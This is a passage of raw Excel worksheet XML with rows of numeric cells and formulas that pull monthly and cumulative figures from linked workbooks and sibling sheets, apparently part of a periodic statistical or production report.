        <v>60.4166666666667</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]18'!$P$6</f>
        <v>57.8703703703704</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]18'!$Q$6</f>
        <v>52.6032196969697</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]18'!$L$6</f>
        <v>14.5</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]18'!$M$6</f>
        <v>250</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]18'!$N$6</f>
        <v>4443.92</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]18'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'17'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]18'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'17'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]18'!$R$7</f>
        <v>175.015384615385</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]18'!$S$7</f>
        <v>198.321585903084</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]18'!$T$7</f>
        <v>188.145652040908</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]18'!$O$7</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]18'!$P$7</f>
        <v>52.5462962962963</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]18'!$Q$7</f>
        <v>50.3027935606061</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]18'!$L$7</f>
        <v>16.25</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]18'!$M$7</f>
        <v>227</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]18'!$N$7</f>
        <v>4249.58</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'17'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'17'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]18'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]18'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]18'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]18'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]18'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]18'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]18'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]18'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]18'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'17'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'17'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]18'!$W$69</f>
        <v>22.6916030534351</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]18'!$X$69</f>
        <v>22.6815003035686</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]18'!$Y$69</f>
        <v>25.2216957355224</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]18'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]18'!$U$69</f>
        <v>77.8518518518518</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]18'!$V$69</f>
        <v>68.8589015151515</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]18'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]18'!$R$69</f>
        <v>336.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]18'!$S$69</f>
        <v>5817.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'17'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'17'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]18'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]18'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]18'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]18'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]18'!$U$104</f>
        <v>53.4645833333333</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]18'!$V$104</f>
        <v>63.8141216856061</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]18'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]18'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]18'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'17'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'17'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]18'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]18'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]18'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]18'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]18'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]18'!$V$105</f>
        <v>33.1934422348485</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]18'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]18'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]18'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'17'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'17'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]18'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]18'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]18'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]18'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]18'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]18'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]18'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]18'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]18'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]18'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]18'!$E$16</f>
        <v>7786</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'17'!H31</f>
        <v>87233</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1460240</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]18'!$I$16</f>
        <v>5504.13</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'17'!K31</f>
        <v>86680.55</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1442728.68</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]18'!$L$16</f>
        <v>65981.82</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>87.97576</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'[11]18'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]18'!$E$13</f>
        <v>6550</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'17'!H32</f>
        <v>91121</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1618964</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]18'!$I$13</f>
        <v>6119</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'17'!K32</f>
        <v>64967</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1086445</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]18'!$L$13</f>
        <v>72130.266</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>144.260532</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]18'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]18'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]18'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]18'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]18'!$U$76</f>
        <v>3.93518518518519e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]18'!$V$76</f>
        <v>4.10748106060606e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]18'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]18'!$R$76</f>
        <v>1.7e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]18'!$S$76</f>
        <v>3.47e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]18'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'17'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]18'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'17'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]18'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]18'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]18'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]18'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]18'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]18'!$U$77</f>
        <v>2.31481481481481e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]18'!$V$77</f>
        <v>59.8937026515166</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]18'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]18'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]18'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]18'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'17'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]18'!$I$50</f>
        <v>2403.05</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'17'!K34</f>
        <v>14461.24</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>481664.17</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]18'!$L$15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'[11]18'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'17'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]18'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'17'!K35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G36+'17'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'17'!K36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G37+'17'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'17'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]18'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]18'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]18'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'17'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]18'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'17'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]18'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'17'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'17'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]18'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]18'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]18'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'17'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]18'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'17'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]18'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'17'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'17'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]18'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]18'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]18'!$R$50</f>
        <v>357.42</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'17'!U39</f>
        <v>5242.16</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>84055.759</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]18'!$V$50</f>
        <v>279</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'17'!X39</f>
        <v>5411</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>84170</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]18'!$Y$50</f>
        <v>1062.706</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'17'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'17'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]18'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]18'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]18'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]18'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]18'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]18'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]18'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]18'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]18'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]18'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]18'!$E$16</f>
        <v>2147</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'17'!H41</f>
        <v>10835</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>135811</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]18'!$I$16</f>
        <v>1058.76</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'17'!K41</f>
        <v>14711.5</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>136105.04</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]18'!$L$16</f>
        <v>22253.26</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>74.1775333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]18'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]18'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]18'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'17'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]18'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'17'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]18'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]18'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]18'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'17'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]18'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'17'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]18'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]18'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]18'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]18'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'17'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]18'!$V$8</f>
        <v>798</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'17'!X42</f>
        <v>11889</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>214360</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]18'!$Y$8</f>
        <v>6217.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]18'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]18'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'17'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]18'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'17'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]18'!$L$14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'[12]18'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'17'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
